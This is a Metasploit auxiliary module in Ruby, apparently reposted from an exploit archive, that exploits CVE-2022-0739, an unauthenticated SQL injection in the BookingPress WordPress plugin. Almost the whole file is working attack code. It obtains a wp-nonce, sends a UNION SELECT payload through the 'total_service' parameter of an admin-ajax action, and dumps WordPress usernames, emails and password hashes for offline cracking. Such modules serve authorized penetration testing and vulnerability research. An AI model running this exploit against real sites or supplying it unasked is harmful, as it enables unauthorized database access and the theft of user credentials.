Share
## https://sploitus.com/exploit?id=PACKETSTORM:180692
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::SQLi  
prepend Msf::Exploit::Remote::AutoCheck  
  
NONCE_NOT_FOUND_ERROR_MSG = 'Unable to get wp-nonce as an unauthenticated user'.freeze  
GET_SQLI_OBJECT_FAILED_ERROR_MSG = 'Unable to successfully retrieve an SQLi object'.freeze  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Wordpress BookingPress bookingpress_front_get_category_services SQLi',  
'Description' => %q{  
The BookingPress WordPress plugin before 1.0.11 fails to properly sanitize user supplied data  
in the `total_service` parameter of the `bookingpress_front_get_category_services` AJAX action  
(available to unauthenticated users), prior to using it in a dynamically constructed SQL query.  
As a result, unauthenticated attackers can conduct an SQL injection attack to dump sensitive  
data from the backend database such as usernames and password hashes.  
  
This module uses this vulnerability to dump the list of WordPress users and their associated  
email addresses and password hashes for cracking offline.  
},  
'Author' => [  
'cydave', # Of cyllective. Discovery of bug.  
'destr4ct', # PoC Code for exploiting the bug.  
'jheysel-r7' # Metasploit module  
],  
'References' => [  
[ 'URL', 'https://github.com/destr4ct/CVE-2022-0739'],  
[ 'WPVDB', '388cd42d-b61a-42a4-8604-99b812db2357'],  
[ 'CVE', '2022-0739']  
],  
'License' => MSF_LICENSE,  
'DisclosureDate' => '2022-02-28',  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'Reliability' => [REPEATABLE_SESSION],  
'SideEffects' => [IOC_IN_LOGS]  
}  
)  
)  
  
register_options([  
OptString.new('TARGETURI', [ true, 'The URL of the BookingPress appointment booking page', '/bookingpress/' ])  
])  
end  
  
def check  
@nonce = get_user_nonce  
return Exploit::CheckCode::Unknown(NONCE_NOT_FOUND_ERROR_MSG) if @nonce == NONCE_NOT_FOUND_ERROR_MSG  
  
@sqli = get_sqli_object  
return Exploit::CheckCode::Unknown(GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG  
return Exploit::CheckCode::Vulnerable if @sqli.test_vulnerable  
  
Exploit::CheckCode::Safe  
end  
  
def generate_vars_post(sqli)  
{  
'action' => 'bookingpress_front_get_category_services', # Vulnerable AJAX action  
'_wpnonce' => @nonce,  
'category_id' => 1,  
'total_service' => "#{rand(100..10000)}#{sqli}"  
}  
end  
  
def get_sqli_object  
create_sqli(dbms: MySQLi::Common, opts: { hex_encode_strings: true }) do |payload|  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri('/wp-admin/admin-ajax.php'),  
'vars_post' =>  
generate_vars_post(") UNION ALL SELECT (#{payload}),456,789,12,34,56,78,90,77 from wp_users-- -")  
})  
  
if res && res.code == 200  
json_doc = res.get_json_document  
if json_doc.blank? || json_doc[0].blank?  
print_error('Could not parse the JSON response returned from the SQLi attempt!')  
return GET_SQLI_OBJECT_FAILED_ERROR_MSG  
end  
  
json_parsed_doc = json_doc[0]['bookingpress_service_id']  
if json_parsed_doc.blank?  
print_error('Was able to parse the JSON response but no bookingpress_service_id field was found!')  
return GET_SQLI_OBJECT_FAILED_ERROR_MSG  
end  
  
json_parsed_doc  
elsif res  
print_error("Unexpected response code encountered when conducting the SQLi attempt: #{res.code}")  
return GET_SQLI_OBJECT_FAILED_ERROR_MSG  
else  
print_error('No response from SQLi attempt')  
return GET_SQLI_OBJECT_FAILED_ERROR_MSG  
end  
end  
end  
  
def get_user_nonce  
res = send_request_cgi({  
'method' => 'POST',  
'uri' => normalize_uri(datastore['TARGETURI'])  
})  
  
return NONCE_NOT_FOUND_ERROR_MSG unless res&.body&.match("_wpnonce:'(\\w+)'\\s*};")  
  
::Regexp.last_match(1)  
end  
  
def run  
@nonce ||= get_user_nonce  
fail_with(Failure::UnexpectedReply, NONCE_NOT_FOUND_ERROR_MSG) if @nonce == NONCE_NOT_FOUND_ERROR_MSG  
@sqli ||= get_sqli_object  
fail_with(Failure::UnexpectedReply, GET_SQLI_OBJECT_FAILED_ERROR_MSG) if @sqli == GET_SQLI_OBJECT_FAILED_ERROR_MSG  
  
creds_table = Rex::Text::Table.new(  
'Header' => 'Wordpress User Credentials',  
'Indent' => 1,  
'Columns' => ['Username', 'Email', 'Hash']  
)  
  
print_status('Extracting credential information')  
users = @sqli.dump_table_fields('wp_users', %w[user_login user_email user_pass])  
  
users.each do |(username, email, hash)|  
creds_table << [username, email, hash]  
create_credential({  
workspace_id: myworkspace_id,  
origin_type: :service,  
module_fullname: fullname,  
username: username,  
private_type: :nonreplayable_hash,  
jtr_format: Metasploit::Framework::Hashes.identify_hash(hash),  
private_data: hash,  
service_name: 'WordPress BookingPress Plugin',  
address: datastore['RHOSTS'],  
port: datastore['RPORT'],  
protocol: 'tcp',  
status: Metasploit::Model::Login::Status::UNTRIED,  
email: email  
})  
end  
print_line creds_table.to_s  
end  
end